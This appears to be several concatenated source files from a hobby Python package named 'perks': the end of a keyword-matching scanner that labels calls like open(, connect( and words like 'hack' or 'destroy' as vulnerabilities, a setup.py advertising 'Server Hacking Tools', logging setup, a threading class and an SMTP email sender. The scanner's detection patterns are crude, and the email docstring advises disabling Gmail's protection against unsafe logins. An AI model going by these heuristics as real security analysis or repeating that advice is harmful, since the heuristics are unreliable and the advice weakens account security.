                print(f"[+][{file}] [line {pos}] :: Connecting something external with the 'with' statement.")
                print()
                DangerDict['with'] += 1
                LineDict['with'].append(pos+1)

            if "open(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Opening a file. Possible risk.")
                print()
                DangerDict['open'] += 1
                LineDict['open'].append(pos+1)

            if "close" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Closing a file. Possible risk.")
                print()
                DangerDict['close'] += 1
                LineDict['close'].append(pos+1)

            if "C:\\" in line or "C:/" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: PATH INDICATED IN FILE.")
                print()
                DangerDict['C:\\'] += 1
                LineDict['C:\\'].append(pos+1)

            if "os.getcwd(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Obtaining the current directory. Hidden information")
                print()
                DangerDict['getcwd'] += 1
                LineDict['getcwd'].append(pos+1)

            if "unlink(" in line or "remove(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Removing a file or an object.")
                print()
                DangerDict['unlink'] += 1
                LineDict['unlink'].append(pos+1)

            if "del " in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Deleting a variable, a function or an object.")
                print()
                DangerDict['del'] += 1
                LineDict['del'].append(pos+1)

            if " int(" in(" "+line) or "float(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Possibly failure of cast changing.")
                print()
                DangerDict['cast'] += 1
                LineDict['cast'].append(pos+1)

            if "walk(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Possibly os.walk() of the entire File-System.")
                print()
                DangerDict['walk'] += 1
                LineDict['walk'].append(pos+1)

            if "connect(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Connection with an external entity")
                print()
                DangerDict['connect'] += 1
                LineDict['connect'].append(pos+1)

            if "hacking" in line or "hack" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Possible dangerous program. Dangerous keyword for 'hacking'.")
                print()
                DangerDict['hacking'] += 1
                LineDict['hacking'].append(pos+1)

            if "destroy" in line or "delete" in line or "remove" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Possible dangerous program. Dangerous keyword 'destroy' or similar.")
                print()
                DangerDict['destroy'] += 1
                LineDict['destroy'].append(pos+1)

            if "import sys" in line or "from sys import" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Importation of the 'sys' module.")
                print()
                DangerDict['sys'] += 1
                LineDict['sys'].append(pos+1)

            if "argv" in line:
                if "sys.argv" in line:
                    print(" >>> " + str(line).strip('\n') + "<<<")
                    print(f"[+][{file}] [line {pos}] :: Dangerous imprevedible shell arguments from sys module.")
                    print()
                    DangerDict['argv'] += 1
                    LineDict['argv'].append(pos+1)
                
                else:
                    print(" >>> " + str(line).strip('\n') + "<<<")
                    print(f"[+][{file}] [line {pos}] :: Possible dangerous keyword 'argv', possible arguments.")
                    print()
                    DangerDict['argv'] += 1
                    LineDict['argv'].append(pos+1)

            if "import perks" in line or "from perks import" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[++][{file}] [line {pos}] :: Extremly dangerous module 'perks'.")
                print()
                DangerDict['perks'] += 1
                LineDict['perks'].append(pos+1)
                
            if args:
                for arg in args:
                    if str(arg) in line:
                        print(" >>> " + str(line).strip('\n') + "<<<")
                        print(f"[+][{file}] [line {pos}] :: *args variable found here.")
                        print()
                        DangerDict['args'] += 1
                        LineDict['args'].append(pos+1)
                        
            _sp(0.01)

        print(":: VULNERABILITY FOUNDED ::\n")
        total = 0

        for key, value in DangerDict.items():
            if value > 0:
                print(str(key) + "\t:: founded [" + str(value) + "]\tlines :: " + str(LineDict[key]))
                total += value

        print("\nTotal Possible Vulnerabilities :: " + str(total))
                
        return None




from setuptools import setup, find_packages

LONG_DESCRIPTION = """
This Library provide several methods for the control of the flow of your program.
You can make Recursive a function , change the font color and the background color of your program,
improve yourself with the Simple MultiThreading that this library offer.
You can manage Server and Client in local, there is also a class for the
management of the SQL Database, based on sqlite3.
Server Hacking Tools are provided by this Library.
'Shell' class is a Class neededonly for me.
There are also an 'old_perks' library,
with the overload of some standard built-in types,
like Int, String, List and Float.
You can also send an e-mail in a very simple way during your program.
There are more and more method to learn so,
Good Luck!
"""

setup(name='perks',
      version='1.25.9',
      author='Marco Della Putta',
      author_email='marcodp183@gmail.com',
      url='https://github.com/Marco-Della-Putta/perks',
      maintainer='Marco Della Putta',
      maintainer_email='marcodp183@gmail.com',
      description='A powerful package that provide some interesting function',
      license='GNU License',
      packages=find_packages(),
      long_description=LONG_DESCRIPTION   
      )



# Basic Logging Configuration #
import logging

# Creation of the formatter
formatter = logging.Formatter("%(module)s, line %(lineno)d :: '%(message)s'")

# Initialization of FileHandlers, and loggers.
chand = logging.FileHandler(r'C:\Users\Marco\Desktop\Python\logs\StdLog\critical.txt')
chand.setFormatter(formatter)
clog = logging.getLogger(__name__)
clog.setLevel(logging.CRITICAL)
clog.addHandler(chand)

ehand = logging.FileHandler(r'C:\Users\Marco\Desktop\Python\logs\StdLog\error.txt')
ehand.setFormatter(formatter)
elog = logging.getLogger(__name__)
elog.setLevel(logging.ERROR)
elog.addHandler(ehand)

whand = logging.FileHandler(r'C:\Users\Marco\Desktop\Python\logs\StdLog\warning.txt')
whand.setFormatter(formatter)
wlog = logging.getLogger(__name__)
wlog.setLevel(logging.WARNING)
wlog.addHandler(whand)

ihand = logging.FileHandler(r'C:\Users\Marco\Desktop\Python\logs\StdLog\info.txt')
ihand.setFormatter(formatter)
ilog = logging.getLogger(__name__)
ilog.setLevel(logging.INFO)
ilog.addHandler(ihand)

dhand = logging.FileHandler(r'C:\Users\Marco\Desktop\Python\logs\StdLog\debug.txt')
dhand.setFormatter(formatter)
dlog = logging.getLogger(__name__)
dlog.setLevel(logging.DEBUG)
dlog.addHandler(dhand)

# __init__ of the STATIC VARIABLE
CLOG = clog
ELOG = elog
WLOG = wlog
ILOG = ilog
DLOG = dlog

# definig a returner for the STATIC VARIABLE
def LOG():
    return CLOG, ELOG, WLOG, ILOG, DLOG









class Mark(type):
    def __new__(cls, name, bases, attr):
        if 'DEVELOPER' not in attr:
            attr.update(DEVELOPER='Marco Della Putta')
        
        return super().__new__(cls, name, bases, attr)

def mdp():
    import os
    import sys
    try:
        if not os.environ.get('PASS_WD'):
            raise Exception

    except:
        sys.exit(0)

        



from perks.DEV import Mark
import os
import threading

########### [SUB-CLASSES] #################### TASK CLASS ################# Over:Default Under:FileWrapper

class Task(threading.Thread, metaclass=Mark):
    """
    Class for Multi - Threading.
    """
    
    def __init__(self, func, *args, lock=True):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
        self.lock = lock
        self.fLock = threading.Lock()

    def run(self):     
        if self.lock:
            self.fLock.acquire()
        self.func(*self.args)

    def set_flag(self, boolean):
        if boolean:
            self.lock = True
        else:
            self.lock = False
            try:
                self.fLock.release()
            except:
                pass
             
    @staticmethod
    def Link(func_one, func_two, delay, args1 = [], args2 = []):
        from time import sleep as _sp
        if not args1:
            first_func = threading.Thread(target=func_one)
        else:
            first_func = threading.Thread(target=func_one, args=tuple(args1))
            
        if not args2:
            second_func = threading.Thread(target=func_two)
        else:
            second_func = threading.Thread(target=func_two, args=tuple(args2))
        first_func.start()
        _sp(delay)
        second_func.start()     

    @classmethod      
    def class_name(cls):
        return cls.__name__
    
    @staticmethod
    def autowrite(text, delay=None):
        import pyautogui
        from time import sleep as _sp
        
        if not delay:
            delay = 0.0

        _sp(0.3)
        pyautogui.typewrite(text, interval=delay)

    @staticmethod
    def login(email, password, reciever, title, text):
        """
        If you use gmail or similar, check if the option for blocking
        not-safe log is enable, if is enable, disable it.
        """
        import smtplib

        title = "Subject: " + str(title) + "\n\n"
        _message = title + text

        _email = smtplib.SMTP("smtp.gmail.com", 587)
              
        _email.ehlo()
        _email.starttls()

        _email.login(email, password)

        _email.sendmail(email, reciever, _message)

        _email.quit()

        return _message
